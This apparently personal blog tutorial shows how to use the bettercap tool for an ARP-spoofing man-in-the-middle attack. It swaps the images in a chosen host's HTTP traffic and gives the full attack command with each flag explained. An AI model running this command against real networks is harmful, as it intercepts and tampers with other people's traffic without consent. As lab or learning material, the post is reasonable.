Replacing HTTP images with Bettercap
I've recently been introduced to the MITM tool bettercap. The project is the same idea as the ettercap tool of old, with many modern improvements.
Bettercap is available as part of the blackarch repositories (if you're not familiar with the project I insist you take a look). The site provides a tutorial on a blackarch install or enabling the repository in a base arch install (I prefer the latter).
Alternatively the bettercap install page presents myriad of installion options including kali repos, git, and GEM. Whatever flavour of linux (and possibly windows?!) you run installation is possible.
evilsocket provides a very simple bettercap proxy module to analyze HTTP traffic and replace the img tag url with that of your locally running server (run by bettercap). To retrieve the file we can issue a simple wget command.
After that the attack is as simple as creating a directory of images, choosing a host, and issuing the attack. I've chosen my images directory as 'images' and the host as '192.168.1.117'. The command to initiate the attack is listed below.
bettercap -I wlp2s0 -S ARP -X --proxy --proxy-module replace_images.rb --httpd --httpd-path images --target 192.168.1.117
Many of these flags are not necessary, however I include them for completeness.
- -I wlp2s0: Specifies which interface to execute on.
- -S ARP: Use ARP to spoof traffic through yourself (default).
- -X: Print packet information to screen.
- --proxy: Act as a proxy for HTTP traffic.
- --proxy-module replace_images.rb: Use the replace images module to modify proxied traffic.
- --httpd --httpd-path images: Start an HTTP daemon with 'images' as the root directory.
- --target 192.168.1.117: Only intercept traffic from this particular host.
Try browsing to an HTTP page with images on the client device and you'll see all of the images replaced by random images in your 'images' directory.
With the increasing adoption of HTTPS this attack is loosing traction. Bettercap, by default, attempts SSL stripping and no doubt supports a variety of SSL downgrading exploits. I haven't had much success with these in the past.